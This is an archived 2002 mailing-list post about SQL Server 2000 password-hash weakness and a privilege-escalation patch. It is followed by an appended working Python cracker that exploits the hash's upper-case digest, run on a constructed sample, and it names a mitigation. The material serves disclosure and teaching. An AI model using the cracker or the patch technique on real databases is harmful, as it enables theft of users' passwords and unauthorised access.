From: Deus, Attonbitus (Thor_at_HAMMEROFGOD.COM)
Date: Wed Jul 10 2002 - 11:35:11 CDT

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    At 01:59 AM 7/9/2002, Barry Dorrans wrote:

    >The password cracker relies on getting access to the hashes that SQL
    >uses to store old style usernames and passwords. These are stored within
    >a SQL database on the servers, and can be retrieved. However, they can
    >ONLY be retrieved by users who already have SA rights. This is the
    >information that theregister, and Mr Greene leaves out. The hashes are
    >stored in sysxlogins, which is not available to your average joe user.

    As described in a paper by Chris Anley,
    http://www.nextgenss.com/papers/violating_database_security.pdf,
    a regular user can employ a simple binary patch to client-side apps using
    the ExecutionContext::UID function to explicitly return "UID 1" to table
    selects, thus giving any user "SA" rights to the table. If the user can
    log on, the user can get to any table.

    I agree that mixed mode should not be used, and that NT integrated
    authentication is the method of choice. I have not had the opportunity to
    check if this works with NT integrated security, but since the "UID 1" is a
    hard-coded value that SQL recognizes as SA for the table, I do not see why
    it would not work.

    The main focus of the paper (by NGSSoftware) that Greene based his article
    on is to show the weakness of the hash-- I think that since any user *can*
    get to the hashes, and since the hash values have been shown to be weak,
    thus resulting in the retrieval of all users' passwords, the paper is
    valuable.

    Even if only true SA could get the hashes, it still allows an attacker much
    more information than they should be able to get. It is similar to pwdump2:
    you have to be admin on the box to use it, but once you get the data, you
    find that compromising other machines downrange is much easier.

    Cheers-

    AD

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.1

    iQA/AwUBPSxiP4hsmyD15h5gEQL5ngCfWaVcB+P03YUpW1JKhqWxynXVOtIAoJYD
    8kNe7ao0//P+YN9wiXR5vr/Y
    =lZYC
    -----END PGP SIGNATURE-----
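The weakness the message refers to is the way SQL Server 2000's pwdencrypt() stores a login password: a 4-byte salt followed by two SHA-1 digests, one over the UTF-16LE password with the salt appended, and a second over the same password forced to upper case. The second digest lets an attacker crack the password case-insensitively first and then recover the exact case with at most 2^n extra hashes for n letters, which is why "weak hash" translates into "every password recovered". The following is an added example, not code from the original post or from NGSSoftware; the password, salt and wordlist are constructed for the demonstration.

```python
import hashlib
import itertools

# SQL Server 2000 pwdencrypt() layout (hex, as it appears in sysxlogins):
#   0x0100 | 4-byte salt | SHA1(utf16le(pw) + salt) | SHA1(utf16le(upper(pw)) + salt)
HEADER = b"\x01\x00"


def mssql2000_pwdencrypt(password: str, salt: bytes) -> str:
    """Reproduce the SQL Server 2000 password hash for a given 4-byte salt."""
    if len(salt) != 4:
        raise ValueError("salt must be exactly 4 bytes")
    mixed = hashlib.sha1(password.encode("utf-16-le") + salt).digest()
    upper = hashlib.sha1(password.upper().encode("utf-16-le") + salt).digest()
    return "0x" + (HEADER + salt + mixed + upper).hex().upper()


def parse_hash(h: str):
    """Split a stored hash into (salt, case-sensitive digest, upper-case digest)."""
    raw = bytes.fromhex(h[2:])
    if len(raw) != 46 or raw[:2] != HEADER:
        raise ValueError("not a SQL Server 2000 pwdencrypt() value")
    return raw[2:6], raw[6:26], raw[26:46]


def case_variants(word: str):
    """Yield every upper/lower case spelling of word (digits and symbols fixed)."""
    options = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in word]
    for combo in itertools.product(*options):
        yield "".join(combo)


def crack(h: str, wordlist):
    """Two-phase attack on the double digest.

    Phase 1 tests each candidate once, case-insensitively, against the
    upper-case digest.  Phase 2 runs only for the single candidate that
    matched and enumerates its case variants against the case-sensitive
    digest.  Returns (recovered_password, sha1_calls) or (None, sha1_calls).
    """
    salt, mixed, upper = parse_hash(h)
    calls = 0
    for word in wordlist:
        cand = word.upper()
        calls += 1
        if hashlib.sha1(cand.encode("utf-16-le") + salt).digest() != upper:
            continue
        # Case-insensitive match found; now recover the exact case.
        for exact in case_variants(cand):
            calls += 1
            if hashlib.sha1(exact.encode("utf-16-le") + salt).digest() == mixed:
                return exact, calls
        return cand, calls  # cannot happen for ASCII passwords, kept for safety
    return None, calls


# Constructed sample: a fixed salt and a password as an attacker would see it
# after reading sysxlogins; the wordlist is also constructed.
SAMPLE_SALT = bytes.fromhex("deadbeef")
SAMPLE_PASSWORD = "Secr3tPa55"
SAMPLE_HASH = mssql2000_pwdencrypt(SAMPLE_PASSWORD, SAMPLE_SALT)
SAMPLE_WORDLIST = ["password", "letmein", "sa", "secr3tpa55", "admin123"]

if __name__ == "__main__":
    print("stored hash:", SAMPLE_HASH)
    recovered, work = crack(SAMPLE_HASH, SAMPLE_WORDLIST)
    print("recovered:", recovered, "after", work, "SHA-1 computations")
```

Without the upper-case digest an attacker would have to try every case variant of every word against the single case-sensitive digest; with it, the case enumeration is paid only once, for the word that already matched. A 2000-era mitigation is exactly the one the message recommends: Windows (NT integrated) authentication, so that sysxlogins holds no SQL login hashes at all.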